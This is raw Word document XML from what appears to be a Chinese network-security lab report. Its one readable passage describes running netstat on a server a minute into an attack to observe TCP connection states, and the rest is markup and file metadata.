        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15CAFAB4" wp14:editId="373D69FE">
            <wp:extent cx="5274310" cy="24758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3FFE" w14:textId="3EA3DDCE" w:rsidR="00CB1B69" w:rsidRDefault="00E80E5A">
      <w:r w:rsidRPr="00E80E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击开始</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80E5A">
        <w:t>1分钟后，在服务器PC打开命令行窗口，运行netstat-n-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E80E5A">
        <w:t>pTcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E80E5A">
        <w:t>命令，查看网络状态，TCP连接状态如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665E97C5" w14:textId="3B703719" w:rsidR="00CB1B69" w:rsidRDefault="00280B38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AFE7C78" wp14:editId="5087B3E0">
            <wp:extent cx="5274310" cy="24422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14EE" w14:textId="1792AAB5" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="70AB96BA" w14:textId="01C24786" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="153E8D2A" w14:textId="1BBA418E" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="53719F07" w14:textId="48EEC375" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="0ACD3946" w14:textId="7E1AD6C4" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="66AE2113" w14:textId="4137CA1E" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="1451B02D" w14:textId="1CE06892" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="681861AF" w14:textId="0A685CB4" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="60B92EF8" w14:textId="3B4BC82B" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="654AFEEC" w14:textId="092293C1" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="0E8B1BCC" w14:textId="09B61BEF" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="2A5A437E" w14:textId="77777777" w:rsidR="00CB1B69" w:rsidRDefault="00CB1B69"/>
    <w:p w14:paraId="34FD56F6" w14:textId="77777777" w:rsidR="00CC2F42" w:rsidRDefault="00CC2F42"/>
    <w:p w14:paraId="4E48A2D3" w14:textId="539B6154" w:rsidR="009A6074" w:rsidRDefault="009A6074"/>
    <w:p w14:paraId="0AF1A3D8" w14:textId="73273E27" w:rsidR="009A6074" w:rsidRDefault="009A6074"/>
    <w:p w14:paraId="43885035" w14:textId="77777777" w:rsidR="009A6074" w:rsidRDefault="009A6074"/>
    <w:sectPr w:rsidR="009A60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60937F" w14:textId="77777777" w:rsidR="007D2CF8" w:rsidRDefault="007D2CF8" w:rsidP="007D2CF8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B2BAF87" w14:textId="77777777" w:rsidR="007D2CF8" w:rsidRDefault="007D2CF8" w:rsidP="007D2C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BA6F3F" w14:textId="77777777" w:rsidR="007D2CF8" w:rsidRDefault="007D2CF8" w:rsidP="007D2CF8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="25F91ADA" w14:textId="77777777" w:rsidR="007D2CF8" w:rsidRDefault="007D2CF8" w:rsidP="007D2C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3A3"/>
    <w:rsid w:val="00021130"/>
    <w:rsid w:val="00030089"/>
    <w:rsid w:val="0006038D"/>
    <w:rsid w:val="00083EE5"/>
    <w:rsid w:val="00087945"/>
    <w:rsid w:val="00091871"/>
    <w:rsid w:val="000F2B97"/>
    <w:rsid w:val="001032B4"/>
    <w:rsid w:val="001359A7"/>
    <w:rsid w:val="00146A4E"/>
    <w:rsid w:val="00163AE2"/>
    <w:rsid w:val="001935FC"/>
    <w:rsid w:val="001B65D6"/>
    <w:rsid w:val="001D2217"/>
    <w:rsid w:val="001F5B36"/>
    <w:rsid w:val="0021127D"/>
    <w:rsid w:val="00262AEB"/>
    <w:rsid w:val="00280B38"/>
    <w:rsid w:val="002A7225"/>
    <w:rsid w:val="002E0C14"/>
    <w:rsid w:val="002F0D3E"/>
    <w:rsid w:val="00336339"/>
    <w:rsid w:val="00350CF8"/>
    <w:rsid w:val="0035703E"/>
    <w:rsid w:val="00357907"/>
    <w:rsid w:val="003A447B"/>
    <w:rsid w:val="003C7C60"/>
    <w:rsid w:val="003E3AD4"/>
    <w:rsid w:val="003F1D28"/>
    <w:rsid w:val="003F6007"/>
    <w:rsid w:val="0044388C"/>
    <w:rsid w:val="004B39CD"/>
    <w:rsid w:val="004C2F55"/>
    <w:rsid w:val="004D3364"/>
    <w:rsid w:val="005068F6"/>
    <w:rsid w:val="0057652A"/>
    <w:rsid w:val="0059592C"/>
    <w:rsid w:val="005B7C6D"/>
    <w:rsid w:val="005F05C4"/>
    <w:rsid w:val="0060105C"/>
    <w:rsid w:val="00602298"/>
    <w:rsid w:val="006A0C14"/>
    <w:rsid w:val="006B587F"/>
    <w:rsid w:val="006D071F"/>
    <w:rsid w:val="007715A6"/>
    <w:rsid w:val="0077441C"/>
    <w:rsid w:val="00796836"/>
    <w:rsid w:val="007A2099"/>
    <w:rsid w:val="007A3E49"/>
    <w:rsid w:val="007B6398"/>
    <w:rsid w:val="007D2943"/>
    <w:rsid w:val="007D2CF8"/>
    <w:rsid w:val="007D40BC"/>
    <w:rsid w:val="007D6467"/>
    <w:rsid w:val="00843A46"/>
    <w:rsid w:val="008673A8"/>
    <w:rsid w:val="00876209"/>
    <w:rsid w:val="00921F3D"/>
    <w:rsid w:val="009423F4"/>
    <w:rsid w:val="00944F13"/>
    <w:rsid w:val="00955D24"/>
    <w:rsid w:val="00972A55"/>
    <w:rsid w:val="009765E2"/>
    <w:rsid w:val="00976CED"/>
    <w:rsid w:val="00993EB1"/>
    <w:rsid w:val="009A6074"/>
    <w:rsid w:val="00A05A91"/>
    <w:rsid w:val="00A45D61"/>
    <w:rsid w:val="00AC39AE"/>
    <w:rsid w:val="00AC47CB"/>
    <w:rsid w:val="00AF2972"/>
    <w:rsid w:val="00AF75C0"/>
    <w:rsid w:val="00B41980"/>
    <w:rsid w:val="00B62D1B"/>
    <w:rsid w:val="00B722AD"/>
    <w:rsid w:val="00B87AE7"/>
    <w:rsid w:val="00B90504"/>
    <w:rsid w:val="00BA504E"/>
    <w:rsid w:val="00BB0B12"/>
    <w:rsid w:val="00BC49A2"/>
    <w:rsid w:val="00BD3D3B"/>
    <w:rsid w:val="00BE45D2"/>
    <w:rsid w:val="00BE4AE7"/>
    <w:rsid w:val="00BF6748"/>
    <w:rsid w:val="00C1366F"/>
    <w:rsid w:val="00C44E3E"/>
    <w:rsid w:val="00CB1B69"/>
    <w:rsid w:val="00CC2F42"/>
    <w:rsid w:val="00CE3FA0"/>
    <w:rsid w:val="00D021BB"/>
    <w:rsid w:val="00D10A0A"/>
    <w:rsid w:val="00D53BD7"/>
    <w:rsid w:val="00D96108"/>
    <w:rsid w:val="00E423A3"/>
    <w:rsid w:val="00E463AE"/>
    <w:rsid w:val="00E46AC3"/>
    <w:rsid w:val="00E80E5A"/>
    <w:rsid w:val="00E84549"/>
    <w:rsid w:val="00EB05C8"/>
    <w:rsid w:val="00EE4229"/>
    <w:rsid w:val="00F61543"/>
    <w:rsid w:val="00F75E20"/>
    <w:rsid w:val="00FC028E"/>
    <w:rsid w:val="00FD0892"/>
    <w:rsid w:val="00FD2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F8EEE40"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{43FD8528-8DAA-4156-A603-4CBD9ECAD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6A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46A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63A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6AC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46A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35703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5703E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163AE2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B722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722AD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7D2C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D2CF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D2C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D2C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2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20</Pages>
  <Words>2084</Words>
  <Characters>11885</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>99</Lines>
  <Paragraphs>27</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13942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强</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>王 强</cp:lastModifiedBy>
  <cp:revision>117</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-16T03:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-22T01:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>